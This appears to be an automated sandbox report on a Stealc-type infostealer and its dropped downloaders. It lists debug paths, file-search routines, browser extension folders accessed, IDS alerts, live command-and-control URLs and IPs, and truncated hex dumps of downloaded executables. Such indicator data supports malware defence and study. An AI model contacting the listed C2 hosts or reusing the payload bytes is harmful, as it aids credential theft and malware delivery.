Source:	Binary string: mozglue.pdb source: u48o.0.exe, 0000000A.00000002.1716466376.000000006C26D000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: Qg_Appv5.exe, 0000000D.00000002.1455543827.000000000701F000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1385724944.00000000009AC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000000.1373724889.00000000009AC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000014.00000000.1384104733.0000000000A3C000.00000002.00000001.01000000.00000010.sdmp, UniversalInstaller.exe, 00000014.00000002.1472732421.0000000000A3C000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2675924617.00000256731F0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: y:C:\xinosa dulicados52\vogewaxupi\gixugajipak20\n.pdb source: zLwT7vCojz.exe, 00000000.00000003.1290625421.0000000005EB1000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000000.1288578944.000000000040F000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UIxMarketPlugin.pdb source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000006E8E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2515162487.00000256581F0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000006B80000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1389721607.000000006C947000.00000002.00000001.01000000.0000000F.sdmp, UniversalInstaller.exe, 00000014.00000002.1484091250.000000006C947000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\yokirew38_tidamikip hopoyura.pdb source: zLwT7vCojz.exe, 00000000.00000002.1558401422.00000000043E6000.00000004.00000020.00020000.00000000.sdmp, zLwT7vCojz.exe, 00000000.00000000.1249880380.000000000040F000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2516504389.00000256583D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\xinosa dulicados52\vogewaxupi\gixugajipak20\n.pdb source: zLwT7vCojz.exe, 00000000.00000003.1290625421.0000000005EB1000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000000.1288578944.000000000040F000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2515303312.0000025658200000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2516000177.00000256583C0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2515303312.0000025658200000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2516000177.00000256583C0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: wntdll.pdbUGP source: Qg_Appv5.exe, 0000000D.00000002.1448048593.0000000005170000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1426785944.0000000003140000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1386928542.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388922444.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475980703.0000000003828000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1477591260.0000000003B80000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1480438511.000000000403F000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713172266.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713421487.00000000053D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676321887.0000025673230000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2620487343.0000025669C2C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: nss3.pdb source: u48o.0.exe, 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: 0C:\yokirew38_tidamikip hopoyura.pdb source: zLwT7vCojz.exe, 00000000.00000002.1558401422.00000000043E6000.00000004.00000020.00020000.00000000.sdmp, zLwT7vCojz.exe, 00000000.00000000.1249880380.000000000040F000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp

Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0041D9E1 FindFirstFileExA,	0_2_0041D9E1
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0433DC48 FindFirstFileExA,	0_2_0433DC48
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	10_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	10_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_004015C0 LocalAlloc,FindFirstFileA,StrCmpCA,StrCmpCA,SetThreadLocale,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	10_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	10_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	10_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	10_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	10_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	10_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	10_2_004121F0
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_6C84261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	18_2_6C84261E

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2856233 ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) 192.168.2.7:49699 -> 185.172.128.90:80
Source: Traffic	Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.7:49703 -> 185.172.128.76:80
Source: Traffic	Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.7:49703 -> 185.172.128.76:80
Source: Traffic	Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 185.172.128.76:80 -> 192.168.2.7:49703
Source: Traffic	Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.7:49703 -> 185.172.128.76:80
Source: Traffic	Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 185.172.128.76:80 -> 192.168.2.7:49703

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 185.172.128.76/3cd2b41cbde8fc9c.php
Source: Malware configuration extractor	URLs: http://185.172.128.76/3cd2b41cbde8fc9c.php

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 91.215.85.66 ports 9000,1,4,5,6,7,15647

Yara detected Generic Downloader

Source: Yara match	File source: 26.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256726b0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578e432f.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25657908739.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578bd525.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.7:49736 -> 91.215.85.66:15647

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Apr 2024 07:43:11 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 23 Apr 2024 07:30:02 GMTETag: "52200-616be85ac7fe9"Accept-Ranges: bytesContent-Length: 336384Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 05 86 02 15 41 e7 6c 46 41 e7 6c 46 41 e7 6c 46 4c b5 b3 46 59 e7 6c 46 4c b5 8c 46 39 e7 6c 46 4c b5 8d 46 6d e7 6c 46 48 9f ff 46 46 e7 6c 46 41 e7 6d 46 2f e7 6c 46 f4 79 89 46 40 e7 6c 46 4c b5 b7 46 40 e7 6c 46 f4 79 b2 46 40 e7 6c 46 52 69 63 68 41 e7 6c 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 82 38 12 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 de 00 00 00 66 c3 03 00 00 00 00 45 39 00 00 00 10 00 00 00 f0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 c4 03 00 04 00 00 b8 67 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 51 01 00 50 00 00 00 00 30 c2 03 d0 1d 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 47 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e3 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 20 6b 00 00 00 f0 00 00 00 6c 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 c6 c0 03 00 60 01 00 00 b6 01 00 00 4e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 1d 02 00 00 30 c2 03 00 1e 02 00 00 04 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 23 Apr 2024 07:28:17 GMTContent-Type: application/octet-streamContent-Length: 8538160Last-Modified: Mon, 22 Apr 2024 21:57:43 GMTConnection: keep-aliveETag: "6626dd57-824830"Strict-Transport-Security: max-age=31536000Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 41 fc f8 63 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 cc 0d 00 00 28 74 00 00 00 00 00 e8 e4 0d 00 00 10 00 00 00 f0 0d 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 82 00 00 04 00 00 29 e5 82 00 02 00 40 01 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 0e 00 28 34 00 00 00 30 10 00 a4 8a 72 00 00 00 00 00 00 00 00 00 00 f8 81 00 30 50 00 00 00 f0 0e 00 78 36 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0e 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 89 0e 00 10 08 00 00 00 c0 0e 00 f6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 b2 0d 00 00 10 00 00 00 b4 0d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 54 16 00 00 00 d0 0d 00 00 18 00 00 00 b8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 2c 27 00 00 00 f0 0d 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 20 53 00 00 00 20 0e 00 00 00 00 00 00 f8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 28 34 00 00 00 80 0e 00 00 36 00 00 00 f8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 f6 03 00 00 00 c0 0e 00 00 04 00 00 00 2e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 3c 00 00 00 00 d0 0e 00 00 00 00 00 00 32 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 e0 0e 00 00 02 00 00 00 32 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 36 01 00 00 f0 0e 00 00 38 01 00 00 34 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 a4 8a 72 00 00 30 10 00 00 8c 72 00 00 6c 0f 00 00 00 00 00 00 00 00 00 00 00
